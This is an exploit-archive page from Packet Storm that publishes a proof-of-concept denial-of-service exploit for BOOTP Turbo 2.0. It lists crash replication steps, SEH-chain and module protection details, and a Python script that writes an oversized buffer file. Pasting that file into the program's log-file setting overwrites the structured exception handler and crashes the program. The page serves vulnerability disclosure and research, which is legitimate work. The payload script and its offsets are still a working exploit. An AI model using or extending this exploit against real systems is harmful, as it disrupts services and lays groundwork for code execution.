what you don't know can hurt you

BOOTP Turbo 2.0 Denial Of Service

BOOTP Turbo 2.0 Denial Of Service
Posted Jan 23, 2020
Authored by boku

BOOTP Turbo version 2.0 SEH denial of service proof of concept exploit.

tags | exploit, denial of service, proof of concept
MD5 | 18bc50dca3e649d4b9eb74b35ddb2a9a

BOOTP Turbo 2.0 Denial Of Service

Change Mirror Download
# Exploit Title: BOOTP Turbo 2.0 - Denial of Service (SEH)(PoC)
# Exploit Author: boku
# Date: 2020-01-22
# Software Vendor: Wierd Solutions
# Vendor Homepage: https://www.weird-solutions.com
# Software Link: https://www.weird-solutions.com/download/products/bootpt_demo_IA32.exe
# Version: BOOTP Turbo (x86) Version 2.0
# Tested On: Windows 10 Pro -- 10.0.18363 Build 18363 x86-based PC
# Tested On: Windows 7 Enterprise SP1 -- build 7601 64-bit
# Replicate Crash:
# 1) Download, Install, and Open BootP Turbo v2.0 for windows x86
# 2) Go to Edit > Settings > Click the Detailed Logging Box
# 3) Run python script, open created file 'crash.txt'
# 4) Select-All > Copy All, from file
# 5) Paste buffer in the 'Log File' text-box, Click 'OK'
# 6) Close the 'Control Service' Pop-Up Window
# 7) Crash with SEH Overwrite

# SEH chain of main thread
# Address SE handler
# 019CD254 43434343
# 42424242 *** CORRUPT ENTRY ***

# Loaded Application Modules
# Rebase | SafeSEH | ASLR | NXCompat | Version, Modulename & Path
# True | True | False | False | 4.7.3.0 [QtGui4.dll] (C:\Program Files\BOOTP Turbo\QtGui4.dll)
# True | True | False | False | 4.7.3.0 [QtCore4.dll] (C:\Program Files\BOOTP Turbo\QtCore4.dll)
# True | True | False | False | 10.00.30319.1 [MSVCP100.dll] (C:\Program Files\BOOTP Turbo\MSVCP100.dll)
# True | True | False | False | 2.0 [bootptui.exe] (C:\Program Files\BOOTP Turbo\bootptui.exe)
# True | True | False | False | 10.00.30319.1 [MSVCR100.dll] (C:\Program Files\BOOTP Turbo\MSVCR100.dll)

#!/usr/bin/python

offset = '\x41'*2196
nSEH = '\x42\x42\x42\x42'
SEH = '\x43\x43\x43\x43'
filler = '\x44'*(3000-len(offset+nSEH+SEH))

payload = offset+nSEH+SEH+filler

try:
f=open("crash.txt","w")
print("[+] Creating %s bytes evil payload." %len(payload))
f.write(payload)
f.close()
print("[+] File created!")
except:
print("File cannot be created.")
Login or Register to add favorites

File Archive:

June 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    10 Files
  • 2
    Jun 2nd
    16 Files
  • 3
    Jun 3rd
    15 Files
  • 4
    Jun 4th
    25 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    0 Files
  • 7
    Jun 7th
    0 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    0 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close